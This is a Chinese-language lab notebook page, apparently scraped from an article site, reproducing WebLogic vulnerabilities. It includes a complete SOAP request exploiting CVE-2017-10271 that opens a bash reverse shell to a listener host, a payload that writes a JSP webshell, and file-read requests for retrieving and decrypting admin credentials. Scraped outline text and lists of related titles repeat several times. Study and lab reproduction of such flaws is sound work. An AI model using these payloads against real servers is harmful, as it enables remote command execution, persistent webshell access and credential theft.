weblogic

程序员文章站 2022-07-15 14:11:48

...

1.Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞（CVE-2017-10271）

Weblogic的WLS Security组件对外提供webservice服务，其中使用了XMLDecoder来解析用户传入的XML数据，在解析的过程中出现反序列化漏洞，导致可执行任意命令

1.kali用nc监听

nc -l -p 222

2.发送数据包反弹shell，shell要进行编码

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.0.104:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 637

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.0.109/222 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

3.上传webshell

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java><java version="1.4.0" class="java.beans.XMLDecoder">
    <object class="java.io.PrintWriter"> 
    <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
    <void method="println"><string>
    <![CDATA[
<% out.print("test"); %>
    ]]>
    </string>
    </void>
    <void method="close"/>
    </object></java></java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>

2.Weblogic WLS核心组件反序列化命令执行突破（CVE-2018-2628）

Oracle 2018年4月补丁中，修复了WebLogic Server WLS核心组件中出现的一个反序列化漏洞（CVE-2018-2628），该中断通过t3协议触发，可导致未授权的用户在远程服务器执行任意命令。

没看懂，需要会java，学完了java再来复现

3.Weblogic任意文件上传漏洞（CVE-2018-2894）

4.Weblogic 管理控制台未授权远程命令执行漏洞（CVE-2020-14882，CVE-2020-14883）

3.4镜像拉取失败，下次再试

5.弱密码

测试环境：

本环境模拟了一个真实的weblogic环境，其后台存在一个弱密码，并且前台存在的任何文件读取。

Weblogic版本：10.3.6（11g）

Java版本：1.6

1.利用任意文件读取漏洞读取后台用户密文和**文件

weblogic密码使用AES（老版本3DES）加密，对称加密可解密，只需要找到用户的密文与加密时的**即可。这两个文件均位于base_domain下，称为SerializedSystemIni.dat和config.xml

GET /hello/file.jsp?path=./security/SerializedSystemIni.dat

weblogic

GET /hello/file.jsp?path=./config/config.xml

weblogic

2.使用decrypt目录下的weblogic_decrypt.jar进行解密

weblogic

weblogic

1.Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞（CVE-2017-10271）

2.Weblogic WLS核心组件反序列化命令执行突破（CVE-2018-2628）

没看懂，需要会java，学完了java再来复现

3.Weblogic任意文件上传漏洞（CVE-2018-2894）

4.Weblogic 管理控制台未授权远程命令执行漏洞（CVE-2020-14882，CVE-2020-14883）

3.4镜像拉取失败，下次再试

5.弱密码

1.利用任意文件读取漏洞读取后台用户密文和**文件

2.使用decrypt目录下的weblogic_decrypt.jar进行解密

3.后台上传shell

Linux 下后台启动Weblogic 博客分类：技术天地 LinuxWeblogicJavaSSHJ2SE

Hibernate3.0在weblogic8.*中异常退出 HibernateWeblogicSQL ServerSQLWeb

理解Oracle WebLogic服务器的关键概念

weblogic ThreadPool has stuck threads

WebLogic 9.2异地IP登录不上的解决方法

Weblogic11g 节点管理器 nodemanager

Oracle WebLogic Server 12.2.1.2安装部署教程

Weblogic Server 启动脚本

WebLogic中Oracle jdbc驱动更新方法

64位Weblogic11g安装

weblogic

1.Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞（CVE-2017-10271）

2.Weblogic WLS核心组件反序列化命令执行突破（CVE-2018-2628）

没看懂，需要会java，学完了java再来复现

3.Weblogic任意文件上传漏洞（CVE-2018-2894）

4.Weblogic 管理控制台未授权远程命令执行漏洞（CVE-2020-14882，CVE-2020-14883）

3.4镜像拉取失败，下次再试

5.弱密码

1.利用任意文件读取漏洞读取后台用户密文和**文件

2.使用decrypt目录下的weblogic_decrypt.jar进行解密

3.后台上传shell

Linux 下后台启动Weblogic 博客分类： 技术天地 LinuxWeblogicJavaSSHJ2SE

Hibernate3.0在weblogic8.*中异常退出 HibernateWeblogicSQL ServerSQLWeb

理解Oracle WebLogic服务器的关键概念

weblogic ThreadPool has stuck threads

WebLogic 9.2异地IP登录不上的解决方法

Weblogic11g 节点管理器 nodemanager

Oracle WebLogic Server 12.2.1.2安装部署教程

Weblogic Server 启动脚本

WebLogic中Oracle jdbc驱动更新方法

64位Weblogic11g安装

Linux 下后台启动Weblogic 博客分类：技术天地 LinuxWeblogicJavaSSHJ2SE